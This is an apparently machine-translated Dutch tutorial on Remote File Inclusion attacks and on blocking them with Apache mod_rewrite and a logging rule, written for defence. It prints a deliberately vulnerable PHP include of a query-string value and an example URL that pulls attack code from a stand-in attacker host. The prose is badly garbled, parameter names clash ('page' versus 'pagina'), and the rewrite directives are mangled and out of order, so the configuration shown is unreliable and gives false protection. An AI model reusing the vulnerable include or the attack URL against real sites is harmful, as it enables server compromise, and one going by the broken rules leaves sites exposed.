Met behulp van mod_rewrite om de opname van externe bestanden te voorkomen

Een van de meest frequente aanvallen geleden door websites wordt gedaan door de poging om bestanden met kwaadaardige code, theoretisch gesproken van een aanval, is in een eenvoudig uit te voeren, om dat te doen, alleen maar omdat een bestand met de kwaadaardige code en een URL te typen browser.

Dit type van aanval, bekend onder de technische term voor Remote File Inclusion of met de simpele afkorting van RFI, wordt vaak geassocieerd met een modus genaamd inbraak XSA (Cross-Server Attack) meestal gedaan om de beveiliging van websites compromis zo niet de webserver, een factor die maakt het nog gevaarlijker voor RFI.

Om een aanval RFI, een aanvaller een "geheugen" in een applicatie waarin u de opname op afstand te maken heeft, deze 'ruimte' is over het algemeen een "gat" (bug) veiligheid dat maakt het een kwetsbaar script.
Het klassieke geval van een lekkage gevoelig zijn voor de RFI is gerelateerd aan het passeren van de pagina door middel van variabele namen, gewoon een simpel stukje code als deze naar een toepassing in gevaar brengen:

 



 # Include bestanden via querystring een variabele doorlopen







 include ($ _GET ['page']);

 

In de code hebben we een ongedefinieerde variabele, of liever gezegd te worden gedefinieerd op basis van parameters die worden verzonden via de querystring, bijvoorbeeld als de rechtstreekse URL naar de pagina met de voorgestelde lijst zou er als volgt uitzien:

 



 http://www.sito.com/index.php?pagina=news.php

 

de waarde van de variabele $ pagina gelijk is aan "News" een aanval op deze toepassing kan worden uitgevoerd op deze manier:

 



 http://www.sito.com/index.php?pagina=http://www.attacco.com/x.php

 

Het bestand "x.php", in het geval van een succesvolle aanval, kon bevatten elk type van kwaadaardige code en schade veroorzaken veel grotere en definitieve dan de eenvoud van de aanval kan worden gemaakt om na te denken.

Gelukkig zijn er enkele verdediging technieken die kunnen worden gebruikt om dergelijke aanvallen te voorkomen, tijdens deze korte bespreking zullen we een analyse op basis van URL-rewrite module (mod_rewrite) die door de Apache webserver, die gebruikt kunnen worden door methoden verschillend.

Een van de meest klassieke om opdrachten te geven om een Apache web server is een klassieker. Htaccess bestand gebruiken om te worden opgenomen in de map die u wilt beveiligen tegen aanvallen.

De eerste methode die we gebruiken is het plaatsen van een eenvoudige regel in a. htaccess bestand:

 RewriteCond% {QUERY_STRING} (.*)( http | https | ftp): \ / \ /(.*)







 ^(.+)$ RewriteRule - [F]

De regel geldt dat geformuleerd in een querystring ("{QUERY_STRING}") kan niet worden doorgegeven argumenten die de achtervoegsels "http", "https" en "ftp", ongeacht wat de inhoud van de vorige of volgende ("(.*)" ) parameters. Als dit gebeurt de webserver zal terugkeren een fout van het type 403 (verboden).

Degenen die de mogelijkheid van directe toegang tot het configuratiebestand van Apache (httpd.conf), kan worden ingevoegd in een enkele container met daarin een richtlijn kan een effect hebben vergelijkbaar met de regels prededentemente te stellen:

 # Controleer of de mod_rewrite beschikbaar is







 <IfModule Mod_rewrite.c>







 # Activeer de URL rewrite engine

 





 RewriteEngine on

 





 # We zetten onze regel tegen RFI







 RewriteCond% {QUERY_STRING} (.*)( http | https | ftp): \ / \ /(.*)







 # Filter de mogelijke aanvragen voor opneming en markeren







 # Vraibile met de omgeving [E = varName: waarde]







 ^(.+)$ RewriteRule - [F, E = RFI: true]

 





 </ IfModule>

 





 # Creaimo een logboek van pogingen om de RFI we identficato







 # Vroeger met behulp van een "omgevingsvariabele"







 CustomLog / mapnaam / rfi.log gecombineerd env = RFI

Na het schrijven van de richtlijn om de configuratie bestand, moet u de wijzigingen opslaan en herstart de webserver door te voeren, er rekening mee dat aan het einde van de notering, en buitenkant van de container is het verzoek opgenomen voor het maken van een logbestand bedoeld om verzoeken van remote file opnemen record, monitoring van deze kleine "het blokkeren van nota's voor RFI aanvallen," zullen we ontdekken dat de pogingen van Remote File Inclusion op onze websites zijn minder zeldzaam dan geloofde.